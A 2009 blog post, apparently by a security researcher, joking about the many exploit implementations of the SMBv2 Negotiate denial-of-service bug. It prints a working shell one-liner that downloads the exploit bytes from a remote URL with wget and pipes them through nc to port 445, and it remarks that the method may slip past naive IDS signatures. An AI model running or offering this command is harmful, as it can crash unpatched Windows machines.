Friday, September 11, 2009

The most implemented exploit ever: SMBv2 Negotiate DoS

Swinging by SecurityFocus' exploit list for the recent SMBv2 denial of service, I was immediately struck by the apparent silliness of listing five separate but nearly identical implementations of the same bug. So struck, I daresay, that I could not resist writing my own stand-alone Ruby version, joking that maybe SecurityFocus would pick it up and make me famous.

Well, they did, and I did lol.

They also picked up I)ruid's much more interesting bash shell version. I thought that opening a socket straight on the command line was strictly the purview of Plan 9, but he proved me wrong.

The most "meta" version, so far, is Brent's wget-to-netcat implementation; I couldn't get it to function exactly as his tweet was written, but here's a version that Works For Me:
for i in `wget http://ur1.ca/bhe8 -q -O-|egrep 'oit.*".*"'|sed 's/s.*[<|=]//g'|sed 's/#.*//g'|sed 's/ "\(.*\)"/\1/'`;do echo -e -n $i;done|nc -w 1 127.0.0.1 445 > /dev/null
This has the added bonus of pushing the payload to nc as a series of small writes (one per echo) rather than a single buffer, so it may go out as several small TCP segments instead of one, which makes naive packet-at-a-time IDS signatures a little more squirrelly. Note that this is segment splitting, not IP fragmentation, and it depends on how nc happens to read the pipe; an IDS that reassembles the TCP stream will still see the whole negotiate request.

At any rate, I think this is all quite hilarious, and now I'm hopeful that the SMBv2 bug will be the widest-implemented DoS ever.

Update: I)ruid has published a version in Expect

Update: I've published a version in Perl

Update: Someone published a version in Java
